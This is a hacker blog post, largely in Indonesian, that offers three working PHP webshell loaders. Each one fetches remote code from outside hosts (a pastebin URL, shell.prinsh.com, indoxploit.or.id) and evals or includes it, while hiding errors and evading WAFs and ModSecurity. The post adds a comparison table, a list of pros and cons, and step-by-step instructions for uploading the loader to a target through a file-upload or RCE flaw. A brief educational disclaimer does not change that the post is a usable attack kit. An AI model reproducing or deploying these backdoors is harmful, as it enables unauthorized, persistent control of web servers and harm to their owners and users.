Bypass Shell Backdoor: Loader PHP Anti 403/500/Blank

6ickzone 0
Bypass Shell Backdoor: Loader PHP Anti 403/500/Blank

Bypass Shell Backdoor: Ini Loader PHP yang Bisa Bypass 403/500/Blank!

Kenapa shell gagal load? Karena WAF, mod_security, atau config PHP yang ketat. Tapi loader ini bisa bypass error 403 / 500 / blank/white screen dan tetap load shell dengan stealth.

1. Eval Loader


<?php

# 6ickzone Eval Loader v1.0

# Bypass 500 + Blank Screen Output (Stealth Eval Shell Loader)

# Coded by: 0x6ick - Inspired by underground bypass method

$url = 'https://pastebin.com/raw/xxxxxxx';

$code = get_payload($url);

ob_start();

if ($code && strpos($code, 'PD9waHA=') === false) {

    eval(base64_decode($code));

    $out = ob_get_contents();

    ob_end_clean();

    echo "<pre>$out</pre>";

    file_put_contents('/tmp/debug_6ickzone.txt', date('Y-m-d H:i:s') . " Output:\n" . $out . "\n\n", FILE_APPEND);

} else {

    echo "Load failed or invalid payload.";

}

function get_payload($url) {

    $ch = curl_init($url);

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

    return curl_exec($ch);

}

?>

2. 6ickzone TMP backdoor


<?php

# 6ickzone TMP Backdoor v2

# Bypass 500 Internal Server Error & Blank Output (WAF Evasion Shell)

# Coded by: 0x6ick - Inspired by L0c4lh34rtz / IndoXploit legacy shell

@ini_set('display_errors', 0);

@set_time_limit(0);

@error_reporting(0);

$payload_url = 'https://shell.prinsh.com/Nathan/gelay.txt';

$tmp_path = '/tmp/.sess_' . substr(md5($_SERVER['HTTP_HOST']), 0, 10) . '.php';

if (isset($_GET['reload']) || !file_exists($tmp_path) || filesize($tmp_path) == 0) {

    $payload = get_payload($payload_url);

    if (stripos($payload, '<?php') !== false) {

        file_put_contents($tmp_path, $payload);

        usleep(300000);

    }

}

if (file_exists($tmp_path) && filesize($tmp_path) > 0) {

    include_once($tmp_path);

    exit;

}

function get_payload($url) {

    $ctx = stream_context_create(['http' => ['timeout' => 3]]);

    $content = @file_get_contents($url, false, $ctx);

    if (!$content) {

        $ch = curl_init();

        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);

        curl_setopt($ch, CURLOPT_URL, $url);

        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);

        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);

        $content = curl_exec($ch);

        curl_close($ch);

    }

    return $content;

}

?>

3. IndoXploit TMP Backdoor 


<?php

# IndoXploit TMP Backdoor

# Bypass 406 Not Acceptable & Auto Delete Shell (WAF Evasion Shell)

# Coded by: L0c4lh34rtz - IndoXploit

$data = ['https://www.indoxploit.or.id/repository/indoxploit_v3.txt', '/tmp/sess_'.md5($_SERVER['HTTP_HOST']).'.php'];

if(file_exists($data[1]) && filesize($data[1]) !== 0) {

    include($data[1]);

} else {

    $fopen = fopen($data[1], 'w+');

    fwrite($fopen, get($data[0]));

    fclose($fopen);

    echo '<script>window.location="?indoxploit";</script>';

}

function get($url) {

    $ch = curl_init();

    curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE);

    curl_setopt($ch, CURLOPT_URL, $url);

    curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);

    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);

    return curl_exec($ch);

    curl_close($ch);

}

?>

Bypass Shell Backdoor - PHP Loader Comparison

This is a collection and comparison of 3 PHP-based shell loaders designed to bypass 403 Forbidden, 500 Internal Server Error, and blank page issues caused by WAFs or server restrictions.

Comparison Table

Loader Name Type Bypass Target Storage Auto Include Author
6ickzone Eval Loader Eval via Base64 500 / Blank No file created No 0x6ick
6ickzone TMP Backdoor v2 File Include 500 / Blank /tmp/.sess_[host].php Yes 0x6ick
IndoXploit TMP Backdoor File Include 406 / Forbidden / Blank /tmp/sess_[md5(host)].php Yes L0c4lh34rtz

Functions & Advantages


[+] Eval Loader (by 6ickzone):
- Cara Kerja:
 Script ini mengambil payload dari URL (berupa base64-encoded PHP shell) dan langsung mengeksekusinya lewat fungsi `eval(base64_decode())`.
  Proses ini dibungkus dengan `ob_start()` dan `ob_get_contents()` agar output shell tetap bisa ditampilkan meski server target diblokir (misalnya blank screen akibat WAF).
 Setelah itu output bisa ditampilkan di browser dan sekaligus disimpan ke file log (`/tmp/debug_6ickzone.txt`).

- Kelebihan:
  - Tidak menyimpan file di server (no footprint).
  - Sangat stealth, cocok untuk quick shell execution.
  - Mendukung logging ke file untuk debugging hasil output.
  - Aman dari banyak filter karena payload base64.
  - Bisa digunakan di server yang error 500 atau blank.

- Kekurangan:
  - Hanya cocok untuk payload berbasis base64.
  - Tidak persist (hilang saat halaman ditutup).
  - Jika payload corrupt atau base64 salah, tidak berjalan.
  - Tidak menyertakan trigger manual.

[+] TMP Backdoor v2 (by 6ickzone):
- Cara Kerja:
  Script ini mengambil payload (PHP shell plaintext) dari URL eksternal dan menyimpannya ke `/tmp/.sess_.php`.
  Jika file sudah ada dan ukurannya > 0, maka langsung di-include otomatis.
  Juga menyediakan fitur `?reload` agar attacker bisa force refresh payload shell dari remote URL, cocok saat shell target direset atau ingin diganti.

- Kelebihan:
  - Persisten (bertahan selama file di /tmp belum terhapus).
  - Hidden file (dotfile .sess_) menghindari deteksi langsung.
  - Bisa reload ulang payload dengan parameter GET (?reload).
  - Fetch payload menggunakan dua metode: file_get & cURL fallback.

- Kekurangan:
  - Menyimpan file di target (berisiko ketahuan oleh admin/server scan).
  - Tidak ada validasi payload isi selain pengecekan file size.
  - Tidak menangkap output (tidak terlihat langsung di browser).
  - Tidak ada logging seperti Eval Loader.

[+] IndoXploit Loader (by L0c4lh34rtz):
- Cara Kerja:
  Script ini juga mengambil shell dari remote URL dan menyimpannya di `/tmp/sess_.php`.
  Jika file belum ada, maka dibuat dan setelah itu browser otomatis redirect ke `?indoxploit` agar shell langsung dipanggil.
  Sederhana namun efektif, cocok untuk bypass 406 Not Acceptable & WAF yang mendeteksi shell standar.

- Kelebihan:
  - Teknik penyimpanan di `/tmp` (persisten).
  - Auto-trigger dengan redirect menggunakan JavaScript.
  - Sudah terbukti lolos banyak WAF (terutama ModSecurity/406).
  - Penamaan file berdasarkan hash host membuatnya unik per target.

- Kekurangan:
  - Tidak memakai base64 atau encode — payload terbuka.
  - 
  - 
  -

Usage Example

1.Upload script loader ke target via file upload / vuln RCE (dsb).
2. Pastikan payload shell tersedia di URL raw (pastebin, your own VPS).
3. Akses script via browser: http://target.com/loader.php
4. Jika berhasil, shell akan termuat (langsung atau melalui /tmp).

Disclaimer

This code and content are for educational purposes only.
We do not support unauthorized access or use of these tools in real-world illegal environments.

Closing

All three loaders are versatile and effective in different contexts. Whether you're testing firewall resistance, bypassing basic protections, or checking WAF blind spots, choose based on your needs.
Respect the pioneers, honor the scene. Salute to L0c4lh34rtz and every coder continuing the craft.

Tags

6ickzone

I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.

Post a Comment

Posting Komentar

Lebih baru Lebih lama

Mengenai Saya

Foto saya
6ickzone
I've been deep in the world of cybersecurity, crypto, AI, and hacking for years. This blog is where I share my journey, tools, tips, and everything I learn along the way. But beyond code and exploits, there's also rhythm. I'm also exploring the digital soundscape — producing beats, fusing dark tech vibes with trap, drill, and EDM. Music is my second language, and it's where I channel the energy of the underground digital world. From my early days as a defacer to my current focus on ethical hacking and experimental music, I’m building 6ickzone as a hybrid space where hacking meets art. Why 6ickzone? 6ickzone is more than just a blog — it's a realm where hackers, beatmakers, and digital renegades gather. Whether you're here for the tools or the tunes, welcome to the zone.
Lihat profil lengkapku

Cari Blog Ini

About